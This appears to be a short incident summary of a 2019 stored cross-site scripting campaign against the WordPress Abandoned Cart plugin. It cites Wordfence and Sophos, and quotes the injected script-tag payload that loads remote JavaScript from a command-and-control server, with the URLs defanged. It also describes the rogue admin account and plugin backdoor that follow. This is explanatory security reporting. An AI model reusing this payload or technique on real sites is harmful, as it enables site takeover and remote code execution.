    The Abandoned Cart plugin had a distinct lack of sanitation on the input and output of fields used when a user begins checking out. The billing_first_name and billing_last_name data fields are stored as entered. The two fields are then displayed concatenated in a customer field when the administrator logs in to view their dashboard.  The attack creates random first and last names and random email addresses to be acceptable form entries, but enters both the first and the last name as the billing_first_name entry and “<script src=hXXps://bit[.]ly/2SzpVBY></script>“ as the billing_last_name field. The URL points to a Command control server, “hXXps://cdn-bigcommerce[.]com/ visionstat.js” which contains a malicious JavaScript payload.

    The attacker first uses the victim’s browser session to make trusted actions on the WordPress website using hidden iframes, acting while the user is unaware of the invasion occurring. The first action taken is creating an administrative user for the site to which the attacker has the credentials. Who needs a backdoor, when you create keys to the front door for yourself? The user to these clandestine accounts has consistently been found to be “woouser” with a “woouser” email at mailinator, a free disposable email.  The malicious JavaScript then infects an inactive plugin with a malicious script that still listens for commands from the C2 server. The script can execute arbitrary PHP code on the compromised server. Both infiltration processes report the infected website’s URL to the C2 server and a confirmation email is sent to the mailinator address to confirm the administrator account.

    A patch for this vulnerability was released, which uses WordPress’ own data sanitizer to exclude names beginning with “<“ and any account with “woouser” in the email. While this prevents the initial attack from creating adversary controlled accounts, it doesn't address the code injection in the deactivated plugins.

Sources:
https://www.wordfence.com/blog/2019/03/xss-flaw-in-abandoned-cartplugin-leads-to-wordpress-site-takeovers/

https:// nakedsecurity.sophos.com/2019/03/13/update-now-wordpress-abandoned-cartplugin-under-attack/Cryptojacking